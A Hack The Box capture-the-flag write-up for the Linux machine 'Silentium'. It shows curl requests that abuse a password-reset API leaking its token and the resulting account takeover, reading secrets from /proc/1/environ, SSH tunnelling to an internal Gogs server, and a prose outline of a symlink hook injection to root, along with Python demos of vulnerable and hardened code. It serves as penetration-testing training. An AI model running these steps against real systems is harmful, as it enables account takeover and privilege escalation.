
Hack The Box

Silentium

Tags: HTB, Easy, Linux, Web, API, PrivEsc

Summary

Silentium is an Easy Linux machine solved by chaining several weaknesses rather than a single exploit. Virtual host fuzzing reveals a staging subdomain whose forgot-password API returns the temporary reset token to the caller, which allows an account takeover and SSH access as ben. Local enumeration of /proc/1/environ exposes secrets and an internal service on port 3001; reached through an SSH tunnel, it turns out to be a Gogs instance, which is exploited with a symlink hook injection to escalate to root.

Machine Information

Name        Difficulty   OS      Platform
Silentium   Easy         Linux   Hack The Box

Attack Path

  1. Nmap reveals SSH and HTTP.
  2. Virtual host fuzzing discovers staging.silentium.htb.
  3. The staging API leaks a password-reset token via forgot-password.
  4. The token is used to reset ben's password (account takeover).
  5. SSH access is obtained as ben.
  6. /proc/1/environ exposes secrets and an internal service on port 3001.
  7. SSH tunneling reaches the internal Gogs instance.
  8. A Gogs symlink hook injection escalates to root.

Reconnaissance

Initial enumeration was performed with Nmap.

nmap -sC -sV -A -T4 10.129.27.123

[Screenshot: Nmap scan]

Only SSH (22) and HTTP (80) were open, with a redirect to http://silentium.htb/ — a strong hint of virtual host routing and possible hidden subdomains.

Web Enumeration

After adding the host to /etc/hosts, the main application was a clean corporate site with no obvious functionality, suggesting the real surface lay in a subdomain or API.

[Screenshot: main page]

Subdomain Discovery

Virtual host fuzzing was performed with ffuf against the Host header. The -fs 8753 filter drops responses of the default virtual host's size, so only hostnames that route to a different application remain.

ffuf -u http://silentium.htb/ \
  -H "Host: FUZZ.silentium.htb" \
  -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
  -fs 8753 -mc 200

[Screenshot: subdomain fuzzing]

This revealed staging.silentium.htb — typically a less hardened environment and a good candidate for logic flaws.

API Enumeration

The staging environment exposed an authentication interface and, more importantly, a password-recovery endpoint.

[Screenshot: login]

curl -s -X POST http://staging.silentium.htb/api/v1/account/forgot-password \
  -H "Content-Type: application/json" \
  -d '{"user":{"email":"ben@silentium.htb"}}'

[Screenshot: forgot password]

Instead of a generic response, the API returned sensitive account data, including a tempToken. A correct implementation answers identically whether or not the address exists and delivers the token only to the mailbox; handing it to the caller breaks the entire recovery mechanism and enables account takeover.

Exploitation — Password Reset Abuse

With the leaked tempToken, the reset endpoint accepted a new password for the target account.

curl -i -X POST http://staging.silentium.htb/api/v1/account/reset-password \
  -H "Content-Type: application/json" \
  -d '{
    "user": {
      "email": "ben@silentium.htb",
      "tempToken": "EFSKdWfe8hE1MrLobGKklbHsF8xDTZMafc809hCVpg8SZxgTxf...",
      "password": "NewPass123!",
      "confirmPassword": "NewPass123!"
    }
  }'

[Screenshot: password reset]

The password change succeeded — a pure business-logic flaw turning user enumeration into full account control.
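The flaw abused above, written out beside a hardened version. This is an added illustration, not Silentium's application code: the in-memory USERS store, the MAILBOX stand-in for the mail sender, the function names and the 15-minute expiry are all assumptions. The vulnerable pair mirrors what staging did (token returned to the caller, unknown addresses reported as errors); the hardened pair returns one generic body, stores only a hash of the token, expires it, and consumes it on first use.

```python
"""Password-reset flow: the staging flaw beside a hardened version.

Added illustration, not the application's code. USERS, MAILBOX, the handler
names and the 900-second expiry are assumptions.
"""
import hashlib
import hmac
import secrets
import time

# Constructed sample user table (plaintext passwords only to keep the demo short).
USERS = {"ben@silentium.htb": {"password": "old-password", "reset": None}}
MAILBOX = {}          # stand-in for SMTP delivery; the token only travels this way
GENERIC = {"message": "If the address exists, a reset link has been emailed."}


def forgot_password_vulnerable(email):
    """Mirrors the staging behaviour: the freshly minted token is handed back
    to whoever asked, and an unknown address gets a different answer."""
    user = USERS.get(email)
    if user is None:
        return {"error": "user not found"}          # also enumerates users
    token = secrets.token_urlsafe(48)
    user["reset"] = {"token": token, "exp": time.time() + 900}
    return {"user": {"email": email, "tempToken": token}}


def reset_password_vulnerable(email, token, new_password):
    user = USERS.get(email)
    if user and user["reset"] and user["reset"]["token"] == token:
        user["password"] = new_password
        return True
    return False


def forgot_password_hardened(email):
    user = USERS.get(email)
    if user is not None:
        token = secrets.token_urlsafe(48)
        # Store only a digest: a database read no longer yields a usable token.
        user["reset"] = {
            "digest": hashlib.sha256(token.encode()).hexdigest(),
            "exp": time.time() + 900,
        }
        MAILBOX.setdefault(email, []).append(token)
    return GENERIC   # identical body for known and unknown addresses


def reset_password_hardened(email, token, new_password, now=None):
    """Constant-time digest comparison, expiry check, single use."""
    now = time.time() if now is None else now
    user = USERS.get(email)
    pending = user["reset"] if user else None
    if pending is None or pending["exp"] < now:
        return False
    presented = hashlib.sha256(token.encode()).hexdigest()
    if not hmac.compare_digest(presented, pending["digest"]):
        return False
    user["reset"] = None
    user["password"] = new_password
    return True


def takeover(email, new_password, forgot, reset):
    """The writeup's chain: call forgot-password, lift tempToken from the
    response, feed it to reset-password. Returns True on a successful takeover."""
    token = forgot(email).get("user", {}).get("tempToken")
    return token is not None and reset(email, token, new_password)


def takeover_vulnerable(email, new_password):
    return takeover(email, new_password, forgot_password_vulnerable, reset_password_vulnerable)


def takeover_hardened(email, new_password):
    return takeover(email, new_password, forgot_password_hardened, reset_password_hardened)
```

Against the hardened handlers the chain stops at the first step: the response carries no token, so the attacker has nothing to present, while the legitimate owner still completes the reset from the mailbox.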

Initial Access

With the new credentials, SSH access was obtained as ben.

ssh ben@10.129.23.208

[Screenshot: SSH access]

Privilege Escalation

Enumeration

Reading the environment of PID 1 exposed secrets and pointed at an internal service. /proc/<pid>/environ is readable only by the process owner or a user with ptrace access to that process, so it is always worth trying for every PID you can reach; the file is NUL-separated, which is why tr is used to put one variable per line.

cat /proc/1/environ | tr '\0' '\n'

[Screenshot: environment variables]

It revealed values such as SMTP_PASSWORD, JWT_SECRET, JWT_REFRESH_TOKEN_SECRET, Flowise parameters, and an internal service listening on port 3001.
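A small triage helper for exactly this step, added here and not part of the writeup: it parses the NUL-separated environ format, flags variables whose names look like secrets, and pulls out ports named directly or embedded in loopback URLs. The sample bytes are constructed; apart from SMTP_PASSWORD, JWT_SECRET and JWT_REFRESH_TOKEN_SECRET, which the page names, the variable names and every value are assumptions.

```python
"""Triage a /proc/<pid>/environ dump for secrets and internal listeners.

Added helper, not from the writeup. SAMPLE_ENVIRON is constructed; only the
three JWT/SMTP names come from the page, the rest are assumptions.
"""
import re
import sys

SECRET_KEY_RE = re.compile(r"(PASS(WORD)?|SECRET|TOKEN|API[_-]?KEY|PRIVATE)", re.I)
URL_PORT_RE = re.compile(r"://[^/\s:]+:(\d{2,5})")

SAMPLE_ENVIRON = (
    b"PATH=/usr/local/bin:/usr/bin:/bin\0"
    b"NODE_ENV=staging\0"
    b"PORT=3001\0"
    b"SMTP_HOST=127.0.0.1\0"
    b"SMTP_PASSWORD=not-the-real-one\0"
    b"JWT_SECRET=fake-jwt-secret\0"
    b"JWT_REFRESH_TOKEN_SECRET=fake-refresh-secret\0"
    b"FLOWISE_API_KEY=fake-flowise-key\0"
    b"FLOWISE_URL=http://127.0.0.1:3000\0"
)


def parse_environ(raw):
    """environ is NUL-separated KEY=VALUE; keep order, tolerate '=' in values."""
    env = {}
    for entry in raw.split(b"\0"):
        if not entry:
            continue
        key, sep, value = entry.decode("utf-8", "replace").partition("=")
        if sep:
            env[key] = value
    return env


def find_secrets(env):
    """Variables whose names suggest credential material."""
    return {k: v for k, v in env.items() if SECRET_KEY_RE.search(k)}


def find_listeners(env):
    """Ports named outright (PORT, *_PORT) or embedded in URLs, e.g. 127.0.0.1:3001."""
    ports = set()
    for key, value in env.items():
        if key.endswith("PORT") and value.isdigit():
            ports.add(int(value))
        for match in URL_PORT_RE.finditer(value):
            ports.add(int(match.group(1)))
    return sorted(ports)


def triage(raw):
    env = parse_environ(raw)
    return {"secrets": sorted(find_secrets(env)), "ports": find_listeners(env)}


if __name__ == "__main__":
    # Usage on a target: python3 triage_environ.py /proc/1/environ
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_ENVIRON
    print(triage(data))
```

Values are deliberately not printed by triage(); list the keys first, then look at the ones you actually need, so a screenshot or a pasted shell log does not become the next leak.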

Pivoting to the internal Gogs

An SSH tunnel exposed the internal service locally.

ssh -L 3001:127.0.0.1:3001 ben@10.129.25.77

[Screenshot: port forwarding]

The service on port 3001 was an internal Gogs (self-hosted Git) instance.

[Screenshot: Gogs]

Gogs symlink hook injection

Gogs was exploited via a symlink hook injection chain: authenticate, create a repository you control, inject a structure containing a symlink, and trigger a Git hook that writes and executes a payload on the host. The run produced a SUID artifact and a shell with euid=0, confirming root. The hook inherits the privileges of the Gogs service; the same chain against an instance running as an unprivileged service account would only yield that account's shell.
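The bug class behind this chain, as an added illustration rather than Gogs' code or the exact exploit used on the box: a repository-controlled symlink that makes a server-side file write land in a hooks directory. The naive check only looks at the lexical path, so a write to docs/pre-receive passes while the kernel follows the symlink into .git/hooks; the resolved check compares real paths and refuses anything that ends up under .git. The temporary layout, the symlink name docs and the hook names are assumptions.

```python
"""Symlink escape from a repository tree: naive path check beside a resolved one.

Added illustration of the bug class, not Gogs' code and not the exploit used
on the box. Layout, the symlink name and the hook names are assumptions.
"""
import os
import tempfile


def in_tree_naive(root, relpath):
    """Lexical check only: 'static/../../x' is caught, a symlink is not."""
    target = os.path.normpath(os.path.join(root, relpath))
    return target.startswith(os.path.join(root, ""))


def in_tree_resolved(root, relpath):
    """Resolve every symlink before comparing against the root, and refuse
    anything that resolves into the .git metadata directory."""
    real_root = os.path.realpath(root)
    target = os.path.realpath(os.path.join(real_root, relpath))
    inside = target.startswith(real_root + os.sep)
    metadata = os.path.join(real_root, ".git")
    return inside and not (target == metadata or target.startswith(metadata + os.sep))


def write_file(root, relpath, data, check):
    """Write only if `check` accepts the path. Returns the resolved destination
    on success, None when the write was refused."""
    if not check(root, relpath):
        return None
    dest = os.path.join(root, relpath)
    with open(dest, "w") as fh:      # open() follows symlinks in the path
        fh.write(data)
    return os.path.realpath(dest)


def demo():
    """Build a tree with a symlink to .git/hooks, then try to write a hook
    through it with both checks. Returns (naive_landed_in_hooks, resolved_refused)."""
    base = tempfile.mkdtemp()
    root = os.path.join(base, "repo")
    hooks = os.path.join(root, ".git", "hooks")
    os.makedirs(hooks)
    # The repository-controlled symlink, committed like any other tree entry.
    os.symlink(os.path.join(".git", "hooks"), os.path.join(root, "docs"))
    payload = "#!/bin/sh\nid > /tmp/pwned\n"   # illustrative payload only
    naive = write_file(root, "docs/pre-receive", payload, in_tree_naive)
    resolved = write_file(root, "docs/post-update", payload, in_tree_resolved)
    landed = naive is not None and os.path.dirname(naive) == os.path.realpath(hooks)
    return landed, resolved is None


if __name__ == "__main__":
    print("naive check let the write reach .git/hooks: %s, resolved check refused: %s" % demo())
```

The same realpath comparison also catches plain ../ traversal, so the resolved check is a superset of the naive one; what it adds is resolving the path the filesystem will actually use rather than the one the request names.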

[Screenshot: privilege escalation]

Flags

User

cat /home/ben/user.txt

[Screenshot: user flag]

e6dca8e69b324f1a217f4e796d1ff922

Root

cat /root/root.txt

[Screenshot: root flag]

f08e07e784230fd8108e8ebcf1a9e861

Vulnerabilities Identified

Information Disclosure in Password Recovery

Impact: user enumeration and exposure of the secret reset token.

Password Reset Logic Flaw

Impact: full account takeover.

Secrets Exposed in Environment Variables

Impact: mapping of internal architecture and pivoting to internal services.

Privileged Internal Gogs

Impact: a Git hook planted through the symlink runs with the privileges of the Gogs service, here root, giving full privilege escalation.

Tools Used

  1. Nmap (port and service discovery)
  2. ffuf (virtual host fuzzing against the Host header)
  3. curl (interaction with the staging API)
  4. SSH (initial access and local port forwarding to the internal service)

Key Takeaways

  1. A redirect to a hostname is an invitation to fuzz the Host header; staging environments frequently ship with weaker logic than production.
  2. A password-recovery endpoint must answer the same way for known and unknown addresses and must never return the reset token to the caller.
  3. Process environments are a rich source of secrets and of internal architecture; read /proc/<pid>/environ wherever it is accessible.
  4. An internal-only service is one SSH tunnel away once a foothold exists, and a self-hosted Git server running with root privileges turns any hook execution bug into a root shell.